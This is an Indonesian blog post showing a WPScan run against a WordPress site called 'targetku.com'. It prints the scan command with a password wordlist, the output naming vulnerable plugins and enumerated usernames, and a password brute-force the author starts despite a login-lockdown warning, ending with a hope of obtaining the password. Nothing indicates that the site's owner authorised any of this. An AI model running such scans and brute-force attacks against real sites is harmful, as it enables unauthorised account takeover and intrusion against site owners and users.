Saturday, August 10, 2013

Test menggunakan WPScan.... :D


root@muring:/pentest/muring-tools/wpscan/wpscan# ruby wpscan.rb --url http://targetku.com --wordlist darkc0de.lst --threads 50

        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                    Version v2.1r6cedd67
     Sponsored by the RandomStorm Open Source Initiative
 @_WPScan_, @ethicalhack3r, @erwan_lr, @gbrindisi, @_FireFart_
_______________________________________________________________
| URL: http://targetku.com/
| Started on Sun Aug 11 12:22:06 2013
[+] robots.txt available under 'http://targetku.com/robots.txt'
[+] Interesting header: SERVER: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_bwlimited/1.4 mod_qos/10.10
[+] Interesting header: X-POWERED-BY: PHP/5.3.22
[+] WordPress version 3.6 identified from advanced fingerprinting

[+] The WordPress theme in use is goblog/color/orange

 | Name: goblog/color/orange
 | Location: http://targetku.com/wp-content/themes/goblog/color/orange/

[+] Enumerating plugins from passive detection ... 
4 plugins found :

 | Name: contact-form-7 v3.4.2
 | Location: http://targetku.com/wp-content/plugins/contact-form-7/
 | Readme: http://targetku.com/wp-content/plugins/contact-form-7/readme.txt

 | Name: easy-table v1.1.1
 | Location: http://targetku.com/wp-content/plugins/easy-table/
 | Readme: http://targetku.com/wp-content/plugins/easy-table/readme.txt

 | Name: jj-nextgen-jquery-slider v1.3.9
 | Location: http://targetku.com/wp-content/plugins/jj-nextgen-jquery-slider/
 | Readme: http://targetku.com/wp-content/plugins/jj-nextgen-jquery-slider/readme.txt

 | Name: nextgen-gallery
 | Location: http://targetku.com/wp-content/plugins/nextgen-gallery/
 | Readme: http://targetku.com/wp-content/plugins/nextgen-gallery/readme.txt
 | Changelog: http://targetku.com/wp-content/plugins/nextgen-gallery/changelog.txt
 |
 | * Title: SWF Vulnerable to XSS Bundled in Many Wordpress Plugins
 | * Reference: http://brindi.si/g/blog/vulnerable-swf-bundled-in-wordpress-plugins.html
 | * Reference: http://secunia.com/advisories/51271/
 |
 | * Title: XSS in NextGEN Gallery <= 1.5.1
 | * Reference: http://www.exploit-db.com/exploits/12098/
 |
 | * Title: swfupload.swf Multiple Cross Site Scripting Vulnerabilities
 | * Reference: http://www.securityfocus.com/bid/60433
 | * Reference: http://brindi.si/g/blog/vulnerable-swf-bundled-in-wordpress-plugins.html
 | * Reference: http://secunia.com/advisories/51271/
 |
 | * Title: XSS in NextGEN Gallery <= 1.5.1
 | * Reference: http://www.exploit-db.com/exploits/12098/
 |
 | * Title: swfupload.swf Multiple Cross Site Scripting Vulnerabilities
 | * Reference: http://www.securityfocus.com/bid/60433
 |
 | * Title: NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684)
 | * Reference: http://wordpress.org/plugins/nextgen-gallery/changelog/
 | * Reference: http://osvdb.org/94232

[+] Enumerating usernames ...
[+] We found the following 7 user/s :
    +----+-----------------+----------------------+
    | Id | Login           | Name                 |
    +----+-----------------+----------------------+
    | 1  | bawa******        | *********        |
    | 4  | rohy*********   | *********        |
    dst...
    +----+-----------------+----------------------+

The plugin login-lockdown has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing !
[?] Do you want to start the brute force anyway ? [y/n]
y

[+] Starting the password brute forcer
  Brute Forcing 'baw****' Time: 00:06:51 <                                                                                   > (1235 / 1707540)  0.07%  ETA: ??:??:??
  ERROR: No response from remote server. WAF/IPS?
  Brute Forcing 'baw****' Time: 00:29:31 <                                                                                   > (5256 / 1707540)  0.30%  ETA: ??:??:??
  ERROR: No response from remote server. WAF/IPS?
  Brute Forcing 'baw****' Time: 01:14:13 <                                                                                  > (12773 / 1707540)  0.74%  ETA: ??:??:??

kalau beruntung... maka dapat passwordnya :D

No comments:

Post a Comment

Silakan berikan komentar anda......